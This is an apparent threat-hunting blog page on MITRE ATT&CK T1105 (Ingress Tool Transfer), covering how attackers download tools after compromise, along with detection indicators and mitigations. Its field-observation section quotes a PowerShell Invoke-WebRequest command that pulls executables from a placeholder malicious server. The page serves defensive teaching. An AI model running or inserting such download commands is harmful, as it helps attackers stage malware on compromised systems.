T1105 - Ingress Tool Transfer
| Revised Date | Comment |
|---|---|
| 27.10.2024 | Added page |
Introduction
The Ingress Tool Transfer technique involves adversaries transferring files such as malware, scripts, or utilities from an external source to a compromised system. After the initial compromise, attackers may need additional tools to escalate privileges, establish persistence, or move laterally across the network. They use network protocols like HTTP, HTTPS, FTP, or SMB to download these tools.
Adversaries typically download their malicious payloads from command and control (C2) servers or compromised websites. The tools may be stored in remote locations such as cloud services or attacker-controlled servers. This method allows attackers to minimize the size and complexity of their initial payload, instead fetching additional tools as needed during the attack.
A note on ingress and egress
Before we dive into T1105, lets pause for a moment for a refresher on the terms ingress and egress:
| Term | Definition | Traffic Direction | Examples | Security Considerations |
|---|---|---|---|---|
| Ingress | Traffic entering a network or system from external sources | Incoming (external → internal) | Web requests, Email traffic, File downloads | Ingress filtering to prevent unauthorized or malicious traffic from entering |
| Egress | Traffic leaving a network or system to external destinations | Outgoing (internal → external) | Web requests, Data uploads, Emails to external addresses | Egress filtering to prevent data exfiltration or malicious traffic from spreading |
How It Works
Once attackers gain access to a system, they need further tools to achieve their objectives, which often include stealing data, maintaining persistence, or performing lateral movement. These tools could be transferred into the victim’s environment using methods like:
| Method | Example / Description |
|---|---|
| PowerShell commands | E.g., Invoke-WebRequest or curl) to download files. |
| Remote transfers | Via FTP, SMB, or HTTP/S from an external server to the compromised machine. |
| File downloads | Initiated by malware as part of a broader infection chain. |
Field Observations
In a scenario I was hunting for, I discovered an adversary using PowerShell to download several malicious tools from an external server. In all essence, the adversary used variants of this command to get their software suite in place:
Invoke-WebRequest "http://malicious-server.com/<toolname>.exe" -OutFile "C:\Users\<UsernameHere>\<toolname>.exe"There were a few things that triggered my senses when I found these, those things were:
- Who uses Powershell and Invoke-WebRequest to download things?
- Why would someone download executables using this method?
- Why did they place the executables in the root of the user home directory?
A regular user has no use for using Powershell to download files to begin with. Besides, a user would normally download executables using a web-browser - and if they do so, the software would most likely end up in the “Downloads” folder. Clearly, I had something situation in my hands here.
Detection
Detecting Ingress Tool Transfer requires monitoring both network activity and system behavior. Here are some key indicators to monitor:
File System Changes
- Unusual file creation, especially in uncommon directories (e.g.,
C:\Users\<username>\AppData\Local\Temp\). - Executable files or scripts being written to disk from external sources. Pay attention to where and ask yourself if it is normal to place it there.
Command Execution
- PowerShell or Bash commands that download files using utilities like
Invoke-WebRequest,curl, orwget. - Pay attention to where such commands may download to.
Network Traffic
- Outbound network traffic to suspicious IP addresses or domains that are not typical for the organization’s environment.
- Large or unusual file transfers, especially over unmonitored or rarely used protocols like FTP.
Anomalous Activity
- Suspicious or abnormal behavior by trusted applications or processes (e.g., browsers or system management tools downloading unexpected files).
Mitigations
Network Segmentation
- Restrict outbound traffic and limit access to external resources, especially on critical systems.
Web Filtering
- Use DNS filtering or web proxies to block access to known malicious domains or IP addresses.
Endpoint Protections
- Deploy endpoint detection and response (EDR) solutions that can flag anomalous file transfers or unauthorized download attempts.
- Implement application allow-listing solutions like AppLocker to prevent unauthorized applications from executing.
Traffic Inspection
- Monitor and log HTTP/HTTPS and other file transfer protocols to identify and block suspicious downloads.
MITRE ATT&CK Detection Category
This technique is categorized under the Command and Control (TA0011) tactic. It involves transferring tools into the compromised system for continued operations.
References
- MITRE ATT&CK T1105: Ingress Tool Transfer